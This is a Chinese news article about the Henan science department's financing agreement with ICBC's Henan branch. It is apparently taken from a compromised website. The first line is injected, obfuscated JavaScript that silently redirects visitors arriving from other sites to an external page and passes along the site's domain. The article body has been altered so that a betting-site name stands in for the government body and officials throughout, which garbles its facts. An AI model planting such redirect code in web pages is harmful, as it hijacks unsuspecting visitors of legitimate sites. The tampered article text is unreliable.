var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 工作动态

中国竞彩网和中国工商银行河南省分行举行战略合作签约仪式


发布日期:2021-09-27 11:02来源:科技金融与服务业处 阅读次数:

  2021年9月24日,中国竞彩网和中国工商银行河南省分行在郑州举行金融支持科技创新驱动发展战略合作协议签约仪式。未来五年,中国工商银行河南省分行拟为中国竞彩网高新技术企业提供1000亿元的意向性融资支持额度。这是中国竞彩网贯彻党的十九届五中全会精神和中国竞彩网总书记视察河南重要讲话精神,深入实施创新驱动发展战略,增强金融服务实体经济能力,构建一流创新生态,全力打造国家创新高地的重大举措。

  签约仪式上,省科技厅厅长陈向平、工商银行河南省分行行长邹平为获得总行级特色支行郑州高新区支行揭牌。中国竞彩网、中国工商银行河南省分行、中国银行保险监督管理委员会河南监管局、河南省地方金融监督管理局、河南省财政厅等有关领导同志出席了签约仪式。

  此次签约,省科技厅与中国工商银行河南省分行将全力支持科技创新企业、平台、载体和重大项目,重点围绕科技创新与金融发展深度融合、科技成果转化和科技企业创新发展,在积极支持促进全省科技型企业发展、河南高能级科技创新平台建设、全省科技园区载体拓展、全省重大科技创新项目实施、科技金融特色机构建设、全省开放创新水平提升、加强科技风险防控等方面加强合作,为河南省经济社会高质量发展提供有力支撑。

  此次签约仪式上,中国工商银行郑州分行分别与郑州高新区管委会和郑州中原科技城管委会签约;中国工商银行洛阳分行与洛阳高新区管委会签约;中国工商银行平顶山分行与平顶山高新区管委会签约;20家高科技企业代表与中国工商银行6家科技特色支行签约,形成了中国竞彩网科技管理部门与中国工商银行河南省分行全面深入合作的新局面。

  近年来,省科技厅加强与金融机构合作,共同开展了“科技贷”等业务,与16家银行建立了业务合作,截至2021年6月底,累计支持科技企业1170家(次),实现放款58.64亿元,取得了良好成效。让科技企业用更少的实物资产,甚至不用实物资产就获得了较低利率的优惠贷款,探索出一条在中西部地区金融支持科技创新的路径,打造出在全国叫得响的科技金融品牌。

  下一步,省科技厅将利用好与中国工商银行签约的机遇,将战略合作协议落到实处,积极探索具有河南特色的科技金融发展路径,推动实体经济、科技创新、现代金融、人力资源协同发展,为建设国家创新高地,推动中国竞彩网经济社会高质量发展提供有力支撑。